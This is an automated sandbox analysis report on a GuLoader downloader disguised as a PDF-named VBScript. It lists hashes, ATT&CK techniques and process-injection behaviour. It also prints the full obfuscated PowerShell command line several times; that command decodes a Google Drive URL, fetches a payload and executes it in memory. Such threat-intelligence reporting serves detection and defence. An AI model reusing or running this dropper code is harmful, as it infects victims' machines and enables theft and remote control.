guloader | 34c2a02d6f7ed81aa8a9f40ac063d1211c2c8bc4a868d76f6067c95113650e2c

General

Target

117532123_20240925-9_MCZB·pdf.vbs
Size

32KB
MD5

d1a211300527f936749e157497ee6bbb
SHA1

c3dde8608211be1f593826d462f07aad30acfcb8
SHA256

34c2a02d6f7ed81aa8a9f40ac063d1211c2c8bc4a868d76f6067c95113650e2c
SHA512

41bce01d8d6f05f1eeca76a3b5ef6708b272fb9f70c2ad41da442e70f9b3b2fb9e94af846b8f837a767b4241f278efa6a35fb4bee17749c3f81176ad55cb7193
SSDEEP

384:3Gd0zog59nv53rIci7Yib5Afi9SYToxbiRjH90e/:Wd0zog59B3rBu55csSmoQRN/

Score

10^/10

guloader discovery downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	3268	WScript.exe
15	1208	powershell.exe
18	1208	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
14	drive.google.com
15	drive.google.com
32	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
4380	wabmig.exe
4380	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3396	powershell.exe
4380	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3396 set thread context of 4380	3396	powershell.exe	97

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1208	powershell.exe
1208	powershell.exe
3396	powershell.exe
3396	powershell.exe
3396	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3396	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	3396	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4380	wabmig.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 3268 wrote to memory of 1208	3268	WScript.exe	84
PID 3268 wrote to memory of 1208	3268	WScript.exe	84
PID 1208 wrote to memory of 3104	1208	powershell.exe	86
PID 1208 wrote to memory of 3104	1208	powershell.exe	86
PID 1208 wrote to memory of 1680	1208	powershell.exe	92
PID 1208 wrote to memory of 1680	1208	powershell.exe	92
PID 1680 wrote to memory of 3396	1680	cmd.exe	93
PID 1680 wrote to memory of 3396	1680	cmd.exe	93
PID 1680 wrote to memory of 3396	1680	cmd.exe	93
PID 3396 wrote to memory of 4560	3396	powershell.exe	96
PID 3396 wrote to memory of 4560	3396	powershell.exe	96
PID 3396 wrote to memory of 4560	3396	powershell.exe	96
PID 3396 wrote to memory of 4380	3396	powershell.exe	97
PID 3396 wrote to memory of 4380	3396	powershell.exe	97
PID 3396 wrote to memory of 4380	3396	powershell.exe	97
PID 3396 wrote to memory of 4380	3396	powershell.exe	97
PID 3396 wrote to memory of 4380	3396	powershell.exe	97

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\117532123_20240925-9_MCZB·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Udnyttelsesretten Weasons Aqueoigneous afskedigelsessituationers Antitussive #>;$Kuratorer='Sknhedens';<#Uninclusive Miscounted Efteraarene Terrieragtig Kontrollens #>;$Makuleringers=$host.PrivateData;If ($Makuleringers) {$Slipperily++;}function Pyraloid($Stonewally){$Cumbu=$Stonewally.Length-$Slipperily;for( $Humaniteten=5;$Humaniteten -lt $Cumbu;$Humaniteten+=6){$Saloondrenes+=$Stonewally[$Humaniteten];}$Saloondrenes;}function Geometrier($Anastassias){ & ($Runddyssens) ($Anastassias);}$garvesyres=Pyraloid 'H mieMOb,esoge viz ResiiScat.lCuddllIncapaDiplo/Laues5Guldl.A.kan0Phyto Novel(FinanWP.goni Ico,nU fridLamino Lei.w AuxosNonli O gleN Muz TStdni Beha 1Gradu0Ravi..Renov0Sol.m;Marke KursWTaxoni TempnBegiv6ent r4 Be,i;Vita Unt,uxVo dt6Amphi4Flles; Hngh SeminrBusedv F er:tomat1Cinch2M spi1 Da a.Mant 0Preor) D tt krukkG ultieBul.ocAntifk Dot o Foli/ Nias2Skotj0Rebri1Crois0An cl0 typi1S,per0Cam,r1 Mell Ra hiFTerroiThundrProgreNeurofhorrios edmx,odem/ egac1,arme2Wakon1 Sydp.Hstak0 Unor ';$unsaturation=Pyraloid ' ispoU egnsShypoaeBi terDi.xi- D,aka,ladvg ommaeKv linHstgitStass ';$Corbeils=Pyraloid 'sond h IntotDemistAssu pCellesSkook:Cerot/ Bags/LieuhdVivisrVentiiSed mvMakroendsfa. Nd.ag Albro rleoLevetgFilsylida aeMi be.LavarcBesejoNitromindkr/Neurau.olencDolic?Dozere reaxArbejpMil aopenger tabut Pari=A sacdsandvoDvrgewSstrknModstlHoefloSup.raFlamidRumty&OxygeiSkylld Bion=Unde 1Gara KopeneZBefan6UnresTRe ni4Hurleh TeleW eritvGe micRhin MPe ceI Mate2ArmgubSikke1P ogrMMi,dazcorpoZDorot6 K arzUndflDSval,OSopr ESuper1 omon-DiiponAand,e T,tapDedik8BruneCAime.0Valdeg SpeirMiohi ';$Humanitetenoners=Pyraloid ' d so>Poly ';$Runddyssens=Pyraloid 'cyanoiBerseEProfeX Cham ';$Elektronikvirksomhed='Fodvorter';$Kameluldssokkernes = Pyraloid ' ZebeeBa,thcAp tah SmasoPlush Forel%Nonmaasakinp rsynp M nadAfskraAl hetHaerga R,tz%Rayde\ByerlpBrdbiaTr,nsrreexpo Spa,rDiviseKalotxPilauiNavnga over.Pu,seSCicatkstrmmaFange Stor&param&Talam C arie BaadcAchr hazulmoNi os stretGgrfr ';Geometrier (Pyraloid 'Scrib$Floodg Ute lCelluoGregab blowaAfsk.l Ra,e:AldazBH.lpeoM skiu Unitl ,exfeHoejrvK llieLske.rSlapssFriheeswagm=Belly(PultecphylamMorged Ku t Praec/ObliqcNobbl Svrtb$A.magK FotoaWhitfm Jarneluft lSe unuafprvl,fsvad SamtsB fras VeksoSekunkMicrok Pr.ne TeenrEndodnd,kupeSl.bbsSteno)Udbul ');Geometrier (Pyraloid ' Mest$,nethgPuttcl Un.coInc.rb Behaameldelggler:AntipTNipafoLntilr bevgsCorolmEminei Sub nUn ubdMisnaeCaboc1Apoti0Nonas4Lejev=O ere$StuddC PustoFar dr VikibKonsieP,roliSu pol ForpsSv,pp.DephysAfperpGalaclUntrei ove,tSou h(Fintf$Ci.arHUforauPantnmFa,ata ProsnHjemmiSeksttSkriveErhvetJasmieMidsenUmangoUsaarn yrleMimisrRetrosSeric)tusin ');Geometrier (Pyraloid 'Bored[FibroNIm.ereOverftUigen.gylteSDisseeAfmasrLutarv,oncliBymidcAttrieUnd.rP BepeoRu gii llemnNervet Fin.MfortlaSeld.nQueuea EgoegsygeleAfprer trab] Nonm:Hyaci:Sp.seS nthee SericAftneuNemesr P oniEthnot,ootdyCompoPHol er.lotno Omsttas rioKol ecSlgtsoLatinlEvalu sk te=,seud Belou[.obalN AfsneProbat.jend.OverhSMicroePolytcTychiu DolkrAnkreiUddrit Chl.yStikbP PhotrLedsao Eph.t Ne so,aboucAntigoAnstalInhabTKarruy stap galeeTyvst]Duks.: Lser:TeglvTMediclPlumbsJ.wcr1Unsur2 Korr ');$Corbeils=$Torsminde104[0];$Sletningernes= (Pyraloid 'Allev$Na koG,skadl arloOFerieb HageaT,abeLPr ci:LoftsTVenneoEta rrCreatN Arc.aclairDB akeODisozE DyreN ers=RawlpN VolueOutscw ephe- utiOLadr bTr gij BloseNonprcIt scT Stor iltoSBalsaYZabelSEgnsttRis.deImpigMKaver.UdsidnsvovlEMargiTsecur.BesteWUngkoeMotiobSulphc IntelAp.liiSmedeEFlaucNMutilT');$Sletningernes+=$Bouleverse[1];Geometrier ($Sletningernes);Geometrier (Pyraloid 'R.sfu$ NoneTGeos,oefterrBelchnVolitaBeskadS biloE,otiehndelnDaybe.ParkeH Sti eHimmeaUltrad ntvaeL.bourFedtfsK amp[Wic.p$ p osu Forsn SheasTred a edet.angsuSofa rNgai aKns,rt.uhrbi DommospandnGallo] Spli= Stor$HighbgSabbaa sta rSkonnvUricae prots FrihyBesidrMetroePostrsUbeta ');$Kunsthaandvrk=Pyraloid 'Salpe$ClinoTImporo Anatr P ron BoltamirthdIllegoFletteStrawnYng.e.Pest DSurfeoFjor wF rmanvink.lMurmuoAp.niaPhotodScholF n nsi c lclAmatreStani(genv.$KdeliCBelysooari rS hoobp.ripeForeliVs,ntlAvidis.ntee, arhu$HonnrDRegisi Sands Skvaf Borga Puckv RundrSubp )Rumr ';$Disfavr=$Bouleverse[0];Geometrier (Pyraloid 'Slag,$fr,iggSensil allioauge,bpalaeASagitLMaler:PolypkB zonlRingtB JohseHorizh rmegJNotesERadikrLystrnSpateEIsskr=Kamik(MelodtUnwo,eWoompsove sTSace -Dyvl Pb.uneaFugtiTfem nh Mank Inte$Cra idBerksI MgliSSvvesfUnflaABroddVPromirA dis)Holo, ');while (!$Klbehjerne) {Geometrier (Pyraloid ' omma$ShipmgTitoilSpaanoglacibResinarusldlAfvrg:D,ndeE Plecn RalltViljeaF.ansnSto mgSmmetl BefoeVersidLedsalExcomy ntra=prepo$IridktInterrRaadiu Cranedekk, ') ;Geometrier $Kunsthaandvrk;Geometrier (Pyraloid 'afspnSS camtlakf a KronrS llat Prop-le tiS Ko klichthe Felde K ngpRound Un,ud4 Unf ');Geometrier (Pyraloid 'Bygrn$ B angspewslMy moo Zambb rantaWea ol Folk:aftgtK A tilNemerbKongreIvanah intj TrimeRe atrBissenMa zie S pt= Rok (Inv rTFrif.ebewarsZephitNar,o-Wors,P boliaBraint TuyehInt,r Stikk$A driDBasali TaarsConfifForneaReprev S,ytrOsage) ivid ') ;Geometrier (Pyraloid 'F bri$Sy.ecgFingel Sta oResidbQu ndaQuruslMoti : CarnRUnde,o Knsto sthmfAdresl mon i Outcn Arc eF.rmusAusk = anke$pantegDend lKag eo Trykb .ipsa Ly tlBista:BantuMAn hte OrnidDriftdUdv deMusiolUndrasVe froStrepmOm enmL sineScr brMislae ektisRa kn+Sovep+ Inte%Sydam$B osyT FleuononsprRetagsForremPlutei UnamnImpredReasseOverh1Nonpe0Nskeg4Heroi.Sinkac Flayo Cotou MetrnIno etVa be ') ;$Corbeils=$Torsminde104[$Rooflines];}$renumbered=345156;$Botnisk=27968;Geometrier (Pyraloid ' Sch,$Skralg olll SubtoDandybSeksuaColonl Rock:ultimBTredviPhen iDublanBlodbdSrlovtRecorgSejlbtBeneae spe rO tcln DisteTerris hamn1 entr3cleme1Efter An i=Subto Ne roG Skrue.lkretO.tho-AllusCShoweo InstnBogtrtScat.elistenBrudftEfter udst$MudroDA lgsiKinoss OprefAfloeaDessev D ntr Tres ');Geometrier (Pyraloid 'P nsi$Asparg Cricl Debao jergbFe lraEfte lBl kf:TiddlPEstimlSprjtoPe riv proge D mnr awkw Fak i=Rad e Sele[ .ereSVoracySt.sesFimbrtApolle Scr mMis a.UdbriCDege oH moonAlkymvP,liteDi chr T.sttEft r] Pat :H nsy:Sa leFArketrPointoSkil,mDvrgvBBeboeaGratis,irkeeUnhar6strsu4Fa tfSDiskutKontorCockiiBellinPaas g.onvo(Bygge$AnflyBFibroiB wshiep sknTakk.dBrndetAfretgUnex tAss reNicarrUdtrkn MinieDru,msStign1Klima3Kompl1Utjle) Spar ');Geometrier (Pyraloid 'Bisma$Fler.g Ina.lSlotsoMortabAyo daAlbuelRegns:SociaFSw ptoPeriurGittedMikroo AcrabSlynglOregoi PotenClaxogUnrele PotenLirels lack1Exult7 Abes3 ridb Ve,se= .rel Ankla[DatabSNedsty Fores Yawnt Po.oeSvrmem Zygo.S epnT oyedeSp inxRediatParri.TagskE p ognSpeedcIsnedoso endvekseiKetchn VenigExped]i blo: ,uto: LegaATraveSFlag CForhaIM rglI nder.HalveG FinieNrittt mmunSTabultT,arirG.undiIndfyn Integwee i(.uber$FubssPA.mysl ramo atirvAfholeLander Rech)Sebor ');Geometrier (Pyraloid 'Klunt$ NutsgHerrelKiasmo lbumbF ackaAutonlRev,v: SterFSpi ii Diprf Strofr,lgni HusdgBero hLaddeeBlackdMyzodeHyperrheroin rtlie OctisFauc.=Desse$Pr.adFStilboPen,er nspidRingboChem bTyknil Rusti Relen Probg,irmee .ntonCykels Tank1,osit7Igni 3 Stb .KatodsMilliu HypebOccupstonertUltrarBo.eyiTilstnAng,igPetit(Sam.r$Legibr DeroeProfin Stinubeskum aforbInklieShinnrudfake,rtild Erik,Kostl$RaserBS.alsord,omtHomosn Sub.iAlgiesSan ekDepri)Bista ');Geometrier $Fiffighedernes;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1208
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\parorexia.Ska && echo t"
    3⤵
    PID:3104
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Udnyttelsesretten Weasons Aqueoigneous afskedigelsessituationers Antitussive #>;$Kuratorer='Sknhedens';<#Uninclusive Miscounted Efteraarene Terrieragtig Kontrollens #>;$Makuleringers=$host.PrivateData;If ($Makuleringers) {$Slipperily++;}function Pyraloid($Stonewally){$Cumbu=$Stonewally.Length-$Slipperily;for( $Humaniteten=5;$Humaniteten -lt $Cumbu;$Humaniteten+=6){$Saloondrenes+=$Stonewally[$Humaniteten];}$Saloondrenes;}function Geometrier($Anastassias){ & ($Runddyssens) ($Anastassias);}$garvesyres=Pyraloid 'H mieMOb,esoge viz ResiiScat.lCuddllIncapaDiplo/Laues5Guldl.A.kan0Phyto Novel(FinanWP.goni Ico,nU fridLamino Lei.w AuxosNonli O gleN Muz TStdni Beha 1Gradu0Ravi..Renov0Sol.m;Marke KursWTaxoni TempnBegiv6ent r4 Be,i;Vita Unt,uxVo dt6Amphi4Flles; Hngh SeminrBusedv F er:tomat1Cinch2M spi1 Da a.Mant 0Preor) D tt krukkG ultieBul.ocAntifk Dot o Foli/ Nias2Skotj0Rebri1Crois0An cl0 typi1S,per0Cam,r1 Mell Ra hiFTerroiThundrProgreNeurofhorrios edmx,odem/ egac1,arme2Wakon1 Sydp.Hstak0 Unor ';$unsaturation=Pyraloid ' ispoU egnsShypoaeBi terDi.xi- D,aka,ladvg ommaeKv linHstgitStass ';$Corbeils=Pyraloid 'sond h IntotDemistAssu pCellesSkook:Cerot/ Bags/LieuhdVivisrVentiiSed mvMakroendsfa. Nd.ag Albro rleoLevetgFilsylida aeMi be.LavarcBesejoNitromindkr/Neurau.olencDolic?Dozere reaxArbejpMil aopenger tabut Pari=A sacdsandvoDvrgewSstrknModstlHoefloSup.raFlamidRumty&OxygeiSkylld Bion=Unde 1Gara KopeneZBefan6UnresTRe ni4Hurleh TeleW eritvGe micRhin MPe ceI Mate2ArmgubSikke1P ogrMMi,dazcorpoZDorot6 K arzUndflDSval,OSopr ESuper1 omon-DiiponAand,e T,tapDedik8BruneCAime.0Valdeg SpeirMiohi ';$Humanitetenoners=Pyraloid ' d so>Poly ';$Runddyssens=Pyraloid 'cyanoiBerseEProfeX Cham ';$Elektronikvirksomhed='Fodvorter';$Kameluldssokkernes = Pyraloid ' ZebeeBa,thcAp tah SmasoPlush Forel%Nonmaasakinp rsynp M nadAfskraAl hetHaerga R,tz%Rayde\ByerlpBrdbiaTr,nsrreexpo Spa,rDiviseKalotxPilauiNavnga over.Pu,seSCicatkstrmmaFange Stor&param&Talam C arie BaadcAchr hazulmoNi os stretGgrfr ';Geometrier (Pyraloid 'Scrib$Floodg Ute lCelluoGregab blowaAfsk.l Ra,e:AldazBH.lpeoM skiu Unitl ,exfeHoejrvK llieLske.rSlapssFriheeswagm=Belly(PultecphylamMorged Ku t Praec/ObliqcNobbl Svrtb$A.magK FotoaWhitfm Jarneluft lSe unuafprvl,fsvad SamtsB fras VeksoSekunkMicrok Pr.ne TeenrEndodnd,kupeSl.bbsSteno)Udbul ');Geometrier (Pyraloid ' Mest$,nethgPuttcl Un.coInc.rb Behaameldelggler:AntipTNipafoLntilr bevgsCorolmEminei Sub nUn ubdMisnaeCaboc1Apoti0Nonas4Lejev=O ere$StuddC PustoFar dr VikibKonsieP,roliSu pol ForpsSv,pp.DephysAfperpGalaclUntrei ove,tSou h(Fintf$Ci.arHUforauPantnmFa,ata ProsnHjemmiSeksttSkriveErhvetJasmieMidsenUmangoUsaarn yrleMimisrRetrosSeric)tusin ');Geometrier (Pyraloid 'Bored[FibroNIm.ereOverftUigen.gylteSDisseeAfmasrLutarv,oncliBymidcAttrieUnd.rP BepeoRu gii llemnNervet Fin.MfortlaSeld.nQueuea EgoegsygeleAfprer trab] Nonm:Hyaci:Sp.seS nthee SericAftneuNemesr P oniEthnot,ootdyCompoPHol er.lotno Omsttas rioKol ecSlgtsoLatinlEvalu sk te=,seud Belou[.obalN AfsneProbat.jend.OverhSMicroePolytcTychiu DolkrAnkreiUddrit Chl.yStikbP PhotrLedsao Eph.t Ne so,aboucAntigoAnstalInhabTKarruy stap galeeTyvst]Duks.: Lser:TeglvTMediclPlumbsJ.wcr1Unsur2 Korr ');$Corbeils=$Torsminde104[0];$Sletningernes= (Pyraloid 'Allev$Na koG,skadl arloOFerieb HageaT,abeLPr ci:LoftsTVenneoEta rrCreatN Arc.aclairDB akeODisozE DyreN ers=RawlpN VolueOutscw ephe- utiOLadr bTr gij BloseNonprcIt scT Stor iltoSBalsaYZabelSEgnsttRis.deImpigMKaver.UdsidnsvovlEMargiTsecur.BesteWUngkoeMotiobSulphc IntelAp.liiSmedeEFlaucNMutilT');$Sletningernes+=$Bouleverse[1];Geometrier ($Sletningernes);Geometrier (Pyraloid 'R.sfu$ NoneTGeos,oefterrBelchnVolitaBeskadS biloE,otiehndelnDaybe.ParkeH Sti eHimmeaUltrad ntvaeL.bourFedtfsK amp[Wic.p$ p osu Forsn SheasTred a edet.angsuSofa rNgai aKns,rt.uhrbi DommospandnGallo] Spli= Stor$HighbgSabbaa sta rSkonnvUricae prots FrihyBesidrMetroePostrsUbeta ');$Kunsthaandvrk=Pyraloid 'Salpe$ClinoTImporo Anatr P ron BoltamirthdIllegoFletteStrawnYng.e.Pest DSurfeoFjor wF rmanvink.lMurmuoAp.niaPhotodScholF n nsi c lclAmatreStani(genv.$KdeliCBelysooari rS hoobp.ripeForeliVs,ntlAvidis.ntee, arhu$HonnrDRegisi Sands Skvaf Borga Puckv RundrSubp )Rumr ';$Disfavr=$Bouleverse[0];Geometrier (Pyraloid 'Slag,$fr,iggSensil allioauge,bpalaeASagitLMaler:PolypkB zonlRingtB JohseHorizh rmegJNotesERadikrLystrnSpateEIsskr=Kamik(MelodtUnwo,eWoompsove sTSace -Dyvl Pb.uneaFugtiTfem nh Mank Inte$Cra idBerksI MgliSSvvesfUnflaABroddVPromirA dis)Holo, ');while (!$Klbehjerne) {Geometrier (Pyraloid ' omma$ShipmgTitoilSpaanoglacibResinarusldlAfvrg:D,ndeE Plecn RalltViljeaF.ansnSto mgSmmetl BefoeVersidLedsalExcomy ntra=prepo$IridktInterrRaadiu Cranedekk, ') ;Geometrier $Kunsthaandvrk;Geometrier (Pyraloid 'afspnSS camtlakf a KronrS llat Prop-le tiS Ko klichthe Felde K ngpRound Un,ud4 Unf ');Geometrier (Pyraloid 'Bygrn$ B angspewslMy moo Zambb rantaWea ol Folk:aftgtK A tilNemerbKongreIvanah intj TrimeRe atrBissenMa zie S pt= Rok (Inv rTFrif.ebewarsZephitNar,o-Wors,P boliaBraint TuyehInt,r Stikk$A driDBasali TaarsConfifForneaReprev S,ytrOsage) ivid ') ;Geometrier (Pyraloid 'F bri$Sy.ecgFingel Sta oResidbQu ndaQuruslMoti : CarnRUnde,o Knsto sthmfAdresl mon i Outcn Arc eF.rmusAusk = anke$pantegDend lKag eo Trykb .ipsa Ly tlBista:BantuMAn hte OrnidDriftdUdv deMusiolUndrasVe froStrepmOm enmL sineScr brMislae ektisRa kn+Sovep+ Inte%Sydam$B osyT FleuononsprRetagsForremPlutei UnamnImpredReasseOverh1Nonpe0Nskeg4Heroi.Sinkac Flayo Cotou MetrnIno etVa be ') ;$Corbeils=$Torsminde104[$Rooflines];}$renumbered=345156;$Botnisk=27968;Geometrier (Pyraloid ' Sch,$Skralg olll SubtoDandybSeksuaColonl Rock:ultimBTredviPhen iDublanBlodbdSrlovtRecorgSejlbtBeneae spe rO tcln DisteTerris hamn1 entr3cleme1Efter An i=Subto Ne roG Skrue.lkretO.tho-AllusCShoweo InstnBogtrtScat.elistenBrudftEfter udst$MudroDA lgsiKinoss OprefAfloeaDessev D ntr Tres ');Geometrier (Pyraloid 'P nsi$Asparg Cricl Debao jergbFe lraEfte lBl kf:TiddlPEstimlSprjtoPe riv proge D mnr awkw Fak i=Rad e Sele[ .ereSVoracySt.sesFimbrtApolle Scr mMis a.UdbriCDege oH moonAlkymvP,liteDi chr T.sttEft r] Pat :H nsy:Sa leFArketrPointoSkil,mDvrgvBBeboeaGratis,irkeeUnhar6strsu4Fa tfSDiskutKontorCockiiBellinPaas g.onvo(Bygge$AnflyBFibroiB wshiep sknTakk.dBrndetAfretgUnex tAss reNicarrUdtrkn MinieDru,msStign1Klima3Kompl1Utjle) Spar ');Geometrier (Pyraloid 'Bisma$Fler.g Ina.lSlotsoMortabAyo daAlbuelRegns:SociaFSw ptoPeriurGittedMikroo AcrabSlynglOregoi PotenClaxogUnrele PotenLirels lack1Exult7 Abes3 ridb Ve,se= .rel Ankla[DatabSNedsty Fores Yawnt Po.oeSvrmem Zygo.S epnT oyedeSp inxRediatParri.TagskE p ognSpeedcIsnedoso endvekseiKetchn VenigExped]i blo: ,uto: LegaATraveSFlag CForhaIM rglI nder.HalveG FinieNrittt mmunSTabultT,arirG.undiIndfyn Integwee i(.uber$FubssPA.mysl ramo atirvAfholeLander Rech)Sebor ');Geometrier (Pyraloid 'Klunt$ NutsgHerrelKiasmo lbumbF ackaAutonlRev,v: SterFSpi ii Diprf Strofr,lgni HusdgBero hLaddeeBlackdMyzodeHyperrheroin rtlie OctisFauc.=Desse$Pr.adFStilboPen,er nspidRingboChem bTyknil Rusti Relen Probg,irmee .ntonCykels Tank1,osit7Igni 3 Stb .KatodsMilliu HypebOccupstonertUltrarBo.eyiTilstnAng,igPetit(Sam.r$Legibr DeroeProfin Stinubeskum aforbInklieShinnrudfake,rtild Erik,Kostl$RaserBS.alsord,omtHomosn Sub.iAlgiesSan ekDepri)Bista ');Geometrier $Fiffighedernes;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1680
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Udnyttelsesretten Weasons Aqueoigneous afskedigelsessituationers Antitussive #>;$Kuratorer='Sknhedens';<#Uninclusive Miscounted Efteraarene Terrieragtig Kontrollens #>;$Makuleringers=$host.PrivateData;If ($Makuleringers) {$Slipperily++;}function Pyraloid($Stonewally){$Cumbu=$Stonewally.Length-$Slipperily;for( $Humaniteten=5;$Humaniteten -lt $Cumbu;$Humaniteten+=6){$Saloondrenes+=$Stonewally[$Humaniteten];}$Saloondrenes;}function Geometrier($Anastassias){ & ($Runddyssens) ($Anastassias);}$garvesyres=Pyraloid 'H mieMOb,esoge viz ResiiScat.lCuddllIncapaDiplo/Laues5Guldl.A.kan0Phyto Novel(FinanWP.goni Ico,nU fridLamino Lei.w AuxosNonli O gleN Muz TStdni Beha 1Gradu0Ravi..Renov0Sol.m;Marke KursWTaxoni TempnBegiv6ent r4 Be,i;Vita Unt,uxVo dt6Amphi4Flles; Hngh SeminrBusedv F er:tomat1Cinch2M spi1 Da a.Mant 0Preor) D tt krukkG ultieBul.ocAntifk Dot o Foli/ Nias2Skotj0Rebri1Crois0An cl0 typi1S,per0Cam,r1 Mell Ra hiFTerroiThundrProgreNeurofhorrios edmx,odem/ egac1,arme2Wakon1 Sydp.Hstak0 Unor ';$unsaturation=Pyraloid ' ispoU egnsShypoaeBi terDi.xi- D,aka,ladvg ommaeKv linHstgitStass ';$Corbeils=Pyraloid 'sond h IntotDemistAssu pCellesSkook:Cerot/ Bags/LieuhdVivisrVentiiSed mvMakroendsfa. Nd.ag Albro rleoLevetgFilsylida aeMi be.LavarcBesejoNitromindkr/Neurau.olencDolic?Dozere reaxArbejpMil aopenger tabut Pari=A sacdsandvoDvrgewSstrknModstlHoefloSup.raFlamidRumty&OxygeiSkylld Bion=Unde 1Gara KopeneZBefan6UnresTRe ni4Hurleh TeleW eritvGe micRhin MPe ceI Mate2ArmgubSikke1P ogrMMi,dazcorpoZDorot6 K arzUndflDSval,OSopr ESuper1 omon-DiiponAand,e T,tapDedik8BruneCAime.0Valdeg SpeirMiohi ';$Humanitetenoners=Pyraloid ' d so>Poly ';$Runddyssens=Pyraloid 'cyanoiBerseEProfeX Cham ';$Elektronikvirksomhed='Fodvorter';$Kameluldssokkernes = Pyraloid ' ZebeeBa,thcAp tah SmasoPlush Forel%Nonmaasakinp rsynp M nadAfskraAl hetHaerga R,tz%Rayde\ByerlpBrdbiaTr,nsrreexpo Spa,rDiviseKalotxPilauiNavnga over.Pu,seSCicatkstrmmaFange Stor&param&Talam C arie BaadcAchr hazulmoNi os stretGgrfr ';Geometrier (Pyraloid 'Scrib$Floodg Ute lCelluoGregab blowaAfsk.l Ra,e:AldazBH.lpeoM skiu Unitl ,exfeHoejrvK llieLske.rSlapssFriheeswagm=Belly(PultecphylamMorged Ku t Praec/ObliqcNobbl Svrtb$A.magK FotoaWhitfm Jarneluft lSe unuafprvl,fsvad SamtsB fras VeksoSekunkMicrok Pr.ne TeenrEndodnd,kupeSl.bbsSteno)Udbul ');Geometrier (Pyraloid ' Mest$,nethgPuttcl Un.coInc.rb Behaameldelggler:AntipTNipafoLntilr bevgsCorolmEminei Sub nUn ubdMisnaeCaboc1Apoti0Nonas4Lejev=O ere$StuddC PustoFar dr VikibKonsieP,roliSu pol ForpsSv,pp.DephysAfperpGalaclUntrei ove,tSou h(Fintf$Ci.arHUforauPantnmFa,ata ProsnHjemmiSeksttSkriveErhvetJasmieMidsenUmangoUsaarn yrleMimisrRetrosSeric)tusin ');Geometrier (Pyraloid 'Bored[FibroNIm.ereOverftUigen.gylteSDisseeAfmasrLutarv,oncliBymidcAttrieUnd.rP BepeoRu gii llemnNervet Fin.MfortlaSeld.nQueuea EgoegsygeleAfprer trab] Nonm:Hyaci:Sp.seS nthee SericAftneuNemesr P oniEthnot,ootdyCompoPHol er.lotno Omsttas rioKol ecSlgtsoLatinlEvalu sk te=,seud Belou[.obalN AfsneProbat.jend.OverhSMicroePolytcTychiu DolkrAnkreiUddrit Chl.yStikbP PhotrLedsao Eph.t Ne so,aboucAntigoAnstalInhabTKarruy stap galeeTyvst]Duks.: Lser:TeglvTMediclPlumbsJ.wcr1Unsur2 Korr ');$Corbeils=$Torsminde104[0];$Sletningernes= (Pyraloid 'Allev$Na koG,skadl arloOFerieb HageaT,abeLPr ci:LoftsTVenneoEta rrCreatN Arc.aclairDB akeODisozE DyreN ers=RawlpN VolueOutscw ephe- utiOLadr bTr gij BloseNonprcIt scT Stor iltoSBalsaYZabelSEgnsttRis.deImpigMKaver.UdsidnsvovlEMargiTsecur.BesteWUngkoeMotiobSulphc IntelAp.liiSmedeEFlaucNMutilT');$Sletningernes+=$Bouleverse[1];Geometrier ($Sletningernes);Geometrier (Pyraloid 'R.sfu$ NoneTGeos,oefterrBelchnVolitaBeskadS biloE,otiehndelnDaybe.ParkeH Sti eHimmeaUltrad ntvaeL.bourFedtfsK amp[Wic.p$ p osu Forsn SheasTred a edet.angsuSofa rNgai aKns,rt.uhrbi DommospandnGallo] Spli= Stor$HighbgSabbaa sta rSkonnvUricae prots FrihyBesidrMetroePostrsUbeta ');$Kunsthaandvrk=Pyraloid 'Salpe$ClinoTImporo Anatr P ron BoltamirthdIllegoFletteStrawnYng.e.Pest DSurfeoFjor wF rmanvink.lMurmuoAp.niaPhotodScholF n nsi c lclAmatreStani(genv.$KdeliCBelysooari rS hoobp.ripeForeliVs,ntlAvidis.ntee, arhu$HonnrDRegisi Sands Skvaf Borga Puckv RundrSubp )Rumr ';$Disfavr=$Bouleverse[0];Geometrier (Pyraloid 'Slag,$fr,iggSensil allioauge,bpalaeASagitLMaler:PolypkB zonlRingtB JohseHorizh 